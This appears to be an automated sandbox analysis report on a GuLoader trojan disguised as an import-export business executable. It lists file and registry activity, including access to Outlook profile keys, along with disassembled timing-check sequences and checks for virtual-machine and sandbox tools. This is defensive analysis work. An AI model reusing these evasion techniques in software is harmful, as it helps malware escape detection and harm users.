Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029860319.000000001DEC0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029835895.000000001DD70000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe	Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe

Source: KHAWATMI CO.IMPORT & EXPORT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7B66B65AC3863AED.TMP

Jump to behavior

Source: KHAWATMI CO.IMPORT & EXPORT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

File read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: KHAWATMI CO.IMPORT & EXPORT.exe

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'	Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_00407A2B push esp; retf	1_2_00407A2C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1636D push ebp; ret	1_2_03D163AB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10062 push esi; iretd	1_2_03D1008F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10005 push esi; iretd	1_2_03D1001D

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10F36 TerminateProcess,LoadLibraryA,	1_2_03D10F36
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FD4	1_2_03D19FD4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FCE	1_2_03D19FCE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FF2	1_2_03D19FF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D111F5 TerminateProcess,	1_2_03D111F5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D135F9	1_2_03D135F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10BEC NtWriteVirtualMemory,	1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FEC	1_2_03D19FEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1A18A	1_2_03D1A18A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D8D NtWriteVirtualMemory,	1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10F51 TerminateProcess,	1_2_03D10F51
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D11546 TerminateProcess,	1_2_03D11546
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1374E	1_2_03D1374E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10F77 TerminateProcess,	1_2_03D10F77
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D18F7D	1_2_03D18F7D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1131A TerminateProcess,	1_2_03D1131A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D12B1E	1_2_03D12B1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D11107 TerminateProcess,	1_2_03D11107
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D39	1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19F3A	1_2_03D19F3A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D134D3	1_2_03D134D3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19E75	1_2_03D19E75
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1347D NtWriteVirtualMemory,	1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1141F TerminateProcess,	1_2_03D1141F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D13827	1_2_03D13827

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

